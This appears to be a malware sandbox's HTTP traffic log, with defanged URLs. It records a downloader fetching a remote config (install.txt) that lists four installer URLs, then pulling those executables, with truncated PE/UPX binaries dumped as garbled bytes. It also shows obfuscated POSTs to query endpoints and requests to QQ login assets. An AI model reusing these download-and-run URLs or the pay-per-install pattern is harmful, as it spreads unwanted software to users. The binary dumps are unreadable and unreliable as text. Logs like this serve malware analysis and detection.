Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00033318230271667466110713

Server: Apache

tracecode: 00033318230271667466110713

Set-Cookie: BAIDUID=37CF03EF72C69E44B1D413F21243AFB1:FG=1; expires=Sun, 06-Nov-16 05:00:03 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /query?cmd=validurl HTTP/1.1

Content-Length: 125

Connection: Keep-Alive

.#4H.......QC...............................y6...............................................................................

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:01 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00016873191213477898110713

Server: Apache

tracecode: 00016873191213477898110713

Set-Cookie: BAIDUID=69DAC83DF6D595A39DEA8B5044D5BB76:FG=1; expires=Sun, 06-Nov-16 05:00:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

GET /package/201511/7c9ddd8b4b286eef807bc97513948574.exe HTTP/1.1

Host: dlsw.br.baidu.com

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: JSP3/2.0.13

Date: Sat, 07 Nov 2015 05:00:00 GMT

Content-Type: application/octet-stream

Content-Length: 7981400

Connection: keep-alive

ETag: "5638867b-79c958"

Last-Modified: Tue, 03 Nov 2015 10:03:39 GMT

Expires: Fri, 19 Oct 2018 09:08:15 GMT

Age: 244305

Cache-Control: max-age=93312000

Accept-Ranges: bytes

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........N..,N..,N..,G.&,O..,UC;,U..,UC.,...,G.6,S..,N..,{..,UC., ..,UC.,...,UC?,O..,UC8,O..,RichN..,........PE..L...X.8V......................q...................@..........................0z......`z...@..................................l..........X|m...........y.X.....y......,.......................m.......m..@...............4............................text............................... ..`.rdata..hn.......p..................@..@.data................n..............@....tls................................@....rsrc...X|m......~m.................@..@.reloc........y.......x.............@..B................................................................................................................................................................................................................................................................................................................h$...h..I..A..........3....j.Y.....t....t.!.......).........H.F...|.3.......@.."|......9.....~.......k...............j.Y.....u............=..H...3.j.Y.....u.........3.1.....}..............j.[....u.!.....A...|.3.1.....}..............j.[....u.!.....A...|.3.......@...|.9.....~.......k...............j.Y.....u.............3.j.Y.....u.....................;.~.k...............j.Y.....u.............3.j.Y.....u.........3....j.[..3.C;.u.!.............A...|.3.......@...|.9.....~.......k...............j.Y.....u.........

<<< skipped >>>

POST /query?cmd=validurl HTTP/1.1

Content-Length: 117

Connection: Keep-Alive

.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:02 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00024709301213477898110713

Server: Apache

tracecode: 00024709301213477898110713

Set-Cookie: BAIDUID=B2053B857F2258D27384FF197E418516:FG=1; expires=Sun, 06-Nov-16 05:00:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /query?cmd=validurl HTTP/1.1

Content-Length: 114

Connection: Keep-Alive

.#4H.......F..>.............................#.)* DYZ

..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK..ijkl

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:04 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00049372701213477898110713

Server: Apache

tracecode: 00049372701213477898110713

Set-Cookie: BAIDUID=6D7EF984AD0193644A842C3587268107:FG=1; expires=Sun, 06-Nov-16 05:00:04 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /query?cmd=url2finfo HTTP/1.1

Content-Length: 131

Connection: Keep-Alive

.#4H.......W.>...............................................................frrfaa)vyyifk.!k.f|.{tr8IHJXXriqLNCG......OSI-./012345

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 04:59:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35991293201911494410110712

Server: Apache

tracecode: 35991293201911494410110712

Set-Cookie: BAIDUID=005B09C6D83A1A4BB9311240B7EFFFDC:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

GET /tool/install.txt HTTP/1.1

User-Agent: DownUpLoad

Host: conf.a101.cc

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 07 Nov 2015 12:58:57 GMT

Content-Type: application/octet-stream

Content-Length: 344

Last-Modified: Wed, 04 Nov 2015 09:04:40 GMT

Connection: keep-alive

ETag: "5639ca28-158"

Accept-Ranges: bytes

[field0]..url=hXXp://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe..[field1]..url=hXXp://download.suxiazai.com/for_down/2013/install1393485.exe..[field2]..url=hXXp://mm.appkhh.com/mmliao/MM-liao8863.exe..[field3]..url=hXXp://j.br.baidu.com/v1/t/full/p/mini/tn/10003408/ch_dl_url.exe..[common]..number=4..filename=qq|rx|mm|bd..

GET /invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe HTTP/1.1

Host: dlied6.qq.com

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1

Connection: Keep-Alive

HTTP/1.1 302 Found

Server: nws 1.2.15

Connection: close

Date: Sat, 07 Nov 2015 04:59:58 GMT

Expires: Sat, 07 Nov 2015 04:59:58 GMT

Cache-Control: max-age=0

Content-Length: 73

Location: hXXp://203.205.148.185/dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe?mkey=563da3bbda60d437&f=1224&p=.exe

The actual URL is '/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe'...

POST /query?cmd=validurl HTTP/1.1

Content-Length: 114

Connection: Keep-Alive

.#4H.......F..>.............................#.)* DYZ

..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK..ijkl

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:11 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00117949801911494410110713

Server: Apache

tracecode: 00117949801911494410110713

Set-Cookie: BAIDUID=2C7B1E2C3C0DA0573611A9CC38E2099E:FG=1; expires=Sun, 06-Nov-16 05:00:11 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /query?cmd=validurl HTTP/1.1

Content-Length: 125

Connection: Keep-Alive

.#4H.......QC...............................y6...............................................................................

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:08 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00080725311213477898110713

Server: Apache

tracecode: 00080725311213477898110713

Set-Cookie: BAIDUID=DA04B4066DA68D7200C3C53637253F4C:FG=1; expires=Sun, 06-Nov-16 05:00:08 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /query?cmd=validurl HTTP/1.1

Content-Length: 96

Connection: Keep-Alive

.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:10 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00109337490271667466110713

Server: Apache

tracecode: 00109337490271667466110713

Set-Cookie: BAIDUID=BA43C3B59B01A15FE3D46D7CEF95CB13:FG=1; expires=Sun, 06-Nov-16 05:00:10 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /query?cmd=validurl HTTP/1.1

Content-Length: 96

Connection: Keep-Alive

.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:02 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00025792010818883082110713

Server: Apache

tracecode: 00025792010818883082110713

Set-Cookie: BAIDUID=B2053B857F2258D266D348C433DA33B2:FG=1; expires=Sun, 06-Nov-16 05:00:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /query?cmd=url2finfo HTTP/1.1

Content-Length: 120

Connection: Keep-Alive

.#4H.......L..BH............................--./01ZG@E..]ULRQQ^$o16<,'=) d(# a)?#7;"8xjikhs40,....UV_T\Q_E...opqrstuvw

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00008202790818883082110713

Server: Apache

tracecode: 00008202790818883082110713

Set-Cookie: BAIDUID=32F3C5706F8B24028DF67F10D2BD5887:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1

Accept: */*

Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: imgcache.qq.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 07 Nov 2015 05:00:29 GMT

Server: PWS/8.1.20.25

X-Px: rf-ht h0-s1127.p11-fra ( h0-s1214.p11-fra), ht h0-s1214.p11-fra.cdngp.net

ETag: "5506987c-1ede"

Cache-Control: max-age=7200

Expires: Sat, 07 Nov 2015 05:23:11 GMT

Age: 5838

Content-Length: 7902

Content-Type: image/gif

Last-Modified: Mon, 16 Mar 2015 08:46:52 GMT

Connection: keep-alive

GIF89as.r.................................................^....A...................! ............B.....}....................1)-t....................j...........................................................c..>..p[E............z...........q.....u.....j.........................................Z.................b..................................................^................................!.......,....s.r.....'..........X......'...............................X.............................X......................................)....Fz%.K.1.......*\......#J.H.....3".........I.....'K.S..e..0..\).&..-m...RgO.3w..94(..F..T.t...P.J.J.*..X...*....%Fr.K....h..].....p....KWn..x....p...'..\....... ^......#K.L.....3C..w..................@...c.....k..g....v.......|....q ..{.....K...te...k..0...'....F......_.........O..............z....B.Y_:.....6.........ZP...b(a..n.!......!.8..".h..(..b.0....2.x..8....;>...@.._.D.i...&i`..q.1..PF)..P>Y..Db...\....^....Y.Y&.[..&._....o....r....l.y..|......J....j(.5$...p\..gIzV..p.....f....v.....*....j.............".....j..<........... ....k...&....6...MD m...X...8....L.....;m.........n....n........ko...................0..$....7....G,....`...< ........C ...$.l.....2.*[.2./.... ..2.7..3.;.,..<....=.-t.H..t.L....PG-..TS...Xg...(t.5...$.....I......_....p{..._....(..w.|....}..w...>.............G....W....d....w.y......].`..80 6.............n............../....o|..$..........Q..U...GF0....w...../.....o.............3 ....a..X.!A!K.....0...@......L......:......'H..Z.......

<<< skipped >>>

POST /query?cmd=validurl HTTP/1.1

Content-Length: 117

Connection: Keep-Alive

.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:04 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00049406280658453514110713

Server: Apache

tracecode: 00049406280658453514110713

Set-Cookie: BAIDUID=6D7EF984AD0193644126EE9989BC78F5:FG=1; expires=Sun, 06-Nov-16 05:00:04 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

GET /for_down/2013/install1393485.exe HTTP/1.1

Host: download.suxiazai.com

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Length: 4787104

Date: Thu, 29 Oct 2015 05:44:24 GMT

Content-Type: application/octet-stream

ETag: "a88697daded0d01:608b2"

Server: Microsoft-IIS/6.0

Last-Modified: Fri, 07 Aug 2015 07:01:16 GMT

Accept-Ranges: bytes

X-Powered-By: ASP.NET

Age: 774938

Via: http/1.1 fnop003-GDSTDX-CT-248-102 (ACA/2.0 ACA_HIT), http/1.1 fnop003-ZJHZFY-CT-11-158 (ACA/2.0 ACA_HIT), http/1.1 fnop003-ZJHZFY-CT-11-165 (ACA/2.0 ACA_HIT)

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........c...............m.......d.....1.......<.R.....<.P.......P.....E...........B...1.m.....1.R.#...S.S.....1.W.....Rich............PE..L....i.T.....................0......`.............@........................... .....j.I.........................................D........'............H.............................................P...H...........................................UPX0....................................UPX1................................@....rsrc....0.......*..................@..............................................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....^v..........W....^Q.&..W_h;...(..{.U..A...;U#.8S..(....t.ZG(.W.R..-G.V..._.......V.Ig.............:...G......u.(....#.Q.B...T.......$.9..]...w.ZZ.dE.W..._..fw ..V/............ .[.r.XO..L..q...;\...XI....2n_L......Y..qZG..)..'MA.h.3..Q...by^.XH........=..&.al$j..M..Z.~i..cmF..*..^.).zg..,7...!.$.or...TI\.^..lV.Zg..D..I...}.EW..o.z.."O.....g......$..UV.O...dp..<$X&W.J...>....>....l.C..d(.i.n.*..S@3b...........s..&K|....!......$................J.~..$..@p....................K.1Srb{.7.SQ......L.....?.i...m.y..N.u.)....u.

<<< skipped >>>

POST /query?cmd=url2finfo HTTP/1.1

Content-Length: 102

Connection: Keep-Alive

.#4H.......:R6.f............................77.9:;TIJOznm.)k'78""#b.!".<??=49x..w75<1gXWQM...ghijklmno

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 04:59:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35999987180581376522110712

Server: Apache

tracecode: 35999987180581376522110712

Set-Cookie: BAIDUID=005B09C6D83A1A4B79939E6BDE03F0EE:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /commit?cmd=finfo HTTP/1.1

Content-Length: 700

Connection: Keep-Alive

.#4H..........T.........................................a..................................................................................S8.....[3..

Z*.............V. !JWPU...MFBII..A@.P[X.^VOY.D[MO%$&l546$%.8d("9!<>37{.....5,211>.VSZRUH..jklmnopqrstuvwxyz{|}~......M.....y.......8..w..u.....lB...<Sr..{...?.....9gO..

.....6V.......0.h<..u.g....."O...R...M]..t42.5.'...'a...W .ST.E...`t.;.....\. ....`.,w...09.\._...N...a6..T..Y".......{......{f...h

....<)..8....m.];>`......l..$S.~..N.fZ.{]......9r.....!...\....S.p...1{~T....V.`...h..p.mGSOJ.^q.t........:......2......]6v..*.... ..a...&....^....r:........~{4.6.:..~.({...o...5(...)7=.7(..I....R.ui.....g/.o...p...q.s.."#$%&'()..:-./01

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:13 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00136416251213477898110713

Server: Apache

tracecode: 00136416251213477898110713

Set-Cookie: BAIDUID=67699F784E2A0D23E0CC41DD2DA72AC7:FG=1; expires=Sun, 06-Nov-16 05:00:13 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

GET /ptlogin/ver/10139/js/xui.js?v=10007 HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: imgcache.qq.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 07 Nov 2015 05:00:29 GMT

Server: PWS/8.1.20.25

X-Px: ms h0-s1127.p11-fra ( h0-s1129.p11-fra), ht h0-s1129.p11-fra.cdngp.net

ETag: "5636be2e-21f8"

Cache-Control: max-age=600

Expires: Sat, 07 Nov 2015 05:00:41 GMT

Age: 588

Content-Length: 3459

Content-Type: application/x-javascript

Content-Encoding: gzip

Vary: Accept-Encoding

Last-Modified: Mon, 02 Nov 2015 01:36:46 GMT

Connection: keep-alive

......6V...Z.w.... X....,..i..qR'..........#.....w........O.i.#''.F..43..4.2.m.......s.D...E`'....0q.2..n}....2..E.g..oD$G.....=.Ca..w.j..M...F5F@.-..v...O\...z.@...f...]R.m6.....zr~u.K.8}wv.K....H5........LWj...X.\..=5.>:...:9$....S......?V.*v.....vG...`.{..t...v.....<.".N.:.(.b.G....:....:..g.............1...r.......9H..cT.._.....Z.n.p.....&...8t.0P......C....LN........._..;G.j.@s...15q.K...9......._...^....Fdbq.LI..na...p......X...F.r.....2...6.q..8..H.B....;j .......-.....fs.j.Q .......?..Kb&H........>h.|.......e>...*...H..J<.E?..Uv.,.@77W.O...C.]O...,.....Co.,.z.1*..W....j..J.\..s=...`.....*.../Dma.....t.p.0...~......1$m3...;F~>n&_f?_\}<..]^..._.&>..T.<..".S....b.......;...f...IL..E.Q...U>..P..iZ..B*V....V..../....|....&......|.....)........[l..!..N..........R=. dZ.X...x........_,...!."t.~_...-.....g!....1..S.#..J.~...p .q..q.....n....uX..sZ._..u...D... s...F....._~4.;.......b..=..k.Kh=.....s...vp.8....f.....*Y..K.s|..4..f....p.w.G.........I.......&]3...........GU....rh/. V.@...?.....{.HC......A.}."..5L.&.....v....4...$..$h.....a"j2..F...4j>$Y...[l.8....jR .G.QC...5.....3..;.e..O..w....63Z...Q.z!.|N.*. ....9@k..?.............#..#.-C.Q:....r.....].G...pO..Q@......2.\........un.Z5.wC.J.>I..!@(...*......./^..7g.g.'....../.L.J.{.G}....Hq....e.4.%."..3......e....i.|..d.8.9..G...L....z......}..@.x'#.<.......%.....E*t.......F....Y.%.....zrzq~3Q0.K....V.)1*.......... ..j....... Z.h..k...v..b.xL..*I.........@v..N?&p...&.....O...........H..-...jO....tN.....@B4vJ.@.....?.1>..

<<< skipped >>>

POST /query?cmd=url2finfo HTTP/1.1

Content-Length: 131

Connection: Keep-Alive

.#4H.......W.>...............................................................frrfaa)vyyifk.!k.f|.{tr8IHJXXriqLNCG......OSI-./012345

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00000046110818948618110713

Server: Apache

tracecode: 00000046110818948618110713

Set-Cookie: BAIDUID=32F3C5706F8B2402C2AC3D655372071C:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /query?cmd=url2finfo HTTP/1.1

Content-Length: 120

Connection: Keep-Alive

.#4H.......L..BH............................--./01ZG@E..]ULRQQ^$o16<,'=) d(# a)?#7;"8xjikhs40,....UV_T\Q_E...opqrstuvw

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 04:59:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35999768410581376522110712

Server: Apache

tracecode: 35999768410581376522110712

Set-Cookie: BAIDUID=005B09C6D83A1A4B4ADDD1A7D9EA5912:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /query?cmd=validurl HTTP/1.1

Content-Length: 125

Connection: Keep-Alive

.#4H.......QC...............................y6...............................................................................

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:06 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00063499440581376522110713

Server: Apache

tracecode: 00063499440581376522110713

Set-Cookie: BAIDUID=FD9EDA96E9FFC3CC09AA604EAEAD5BD2:FG=1; expires=Sun, 06-Nov-16 05:00:06 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /query?cmd=validurl HTTP/1.1

Content-Length: 114

Connection: Keep-Alive

.#4H.......F..>.............................#.)* DYZ

..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK..ijkl

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:02 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00024854541213477898110713

Server: Apache

tracecode: 00024854541213477898110713

Set-Cookie: BAIDUID=B2053B857F2258D280860D7625D53A9A:FG=1; expires=Sun, 06-Nov-16 05:00:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

GET /cgi-bin/report?id=89217 HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ui.ptlogin2.qq.com

Connection: Keep-Alive

Cookie: pt_local_token=-1924241393; ptui_qstatus=3

HTTP/1.1 200 OK

Connection: keep-alive

Keep-Alive: timeout=50, max=1024

Server: QZHTTP-2.38.20

Date: Sat, 07 Nov 2015 05:00:30 GMT

Pragma: no-cache

Cache-Control: no-cache; must-revalidate

Content-Type: image/bmp;

Content-Length: 66

BMB.......>...(...................................................HTTP/1.1 200 OK..Connection: keep-alive..Keep-Alive: timeout=50, max=1024..Server: QZHTTP-2.38.20..Date: Sat, 07 Nov 2015 05:00:30 GMT..Pragma: no-cache..Cache-Control: no-cache; must-revalidate..Content-Type: image/bmp;..Content-Length: 66..BMB.......>...(.....................................................

GET /View/Home/Task/css.base.css?1.0.247 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.meiheitou.com

Connection: Keep-Alive

Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 07 Nov 2015 04:59:50 GMT

Content-Type: text/css

Content-Length: 4860

Last-Modified: Mon, 19 Oct 2015 03:49:41 GMT

Connection: keep-alive

Vary: Accept-Encoding

ETag: "56246855-12fc"

Expires: Sat, 07 Nov 2015 16:59:50 GMT

Cache-Control: max-age=43200

Accept-Ranges: bytes

<<< skipped >>>

GET /View/Home/Task/css.task.css?1.0.247 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.meiheitou.com

Connection: Keep-Alive

Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 07 Nov 2015 04:59:50 GMT

Content-Type: text/css

Content-Length: 2042

Last-Modified: Mon, 19 Oct 2015 07:02:19 GMT

Connection: keep-alive

Vary: Accept-Encoding

ETag: "5624957b-7fa"

Expires: Sat, 07 Nov 2015 16:59:50 GMT

Cache-Control: max-age=43200

Accept-Ranges: bytes

<<< skipped >>>

GET /Public/html5shiv/3.7.2/html5shiv.min.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.meiheitou.com

Connection: Keep-Alive

Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 07 Nov 2015 04:59:51 GMT

Content-Type: application/javascript

Content-Length: 2639

Last-Modified: Sat, 14 Mar 2015 18:06:30 GMT

Connection: keep-alive

Vary: Accept-Encoding

ETag: "550478a6-a4f"

Expires: Sat, 07 Nov 2015 16:59:51 GMT

Cache-Control: max-age=43200

Accept-Ranges: bytes

/**..* @preserve HTML5 Shiv 3.7.2 | @afarkas @jdalton @jon_neal @rem | MIT/GPL2 Licensed..*/..!function(a,b){function c(a,b){var c=a.createElement("p"),d=a.getElementsByTagName("head")[0]||a.documentElement;return c.innerHTML="x<style>" b "</style>",d.insertBefore(c.lastChild,d.firstChild)}function d(){var a=t.elements;return"string"==typeof a?a.split(" "):a}function e(a,b){var c=t.elements;"string"!=typeof c&&(c=c.join(" ")),"string"!=typeof a&&(a=a.join(" ")),t.elements=c " " a,j(b)}function f(a){var b=s[a[q]];return b||(b={},r ,a[q]=r,s[r]=b),b}function g(a,c,d){if(c||(c=b),l)return c.createElement(a);d||(d=f(c));var e;return e=d.cache[a]?d.cache[a].cloneNode():p.test(a)?(d.cache[a]=d.createElem(a)).cloneNode():d.createElem(a),!e.canHaveChildren||o.test(a)||e.tagUrn?e:d.frag.appendChild(e)}function h(a,c){if(a||(a=b),l)return a.createDocumentFragment();c=c||f(a);for(var 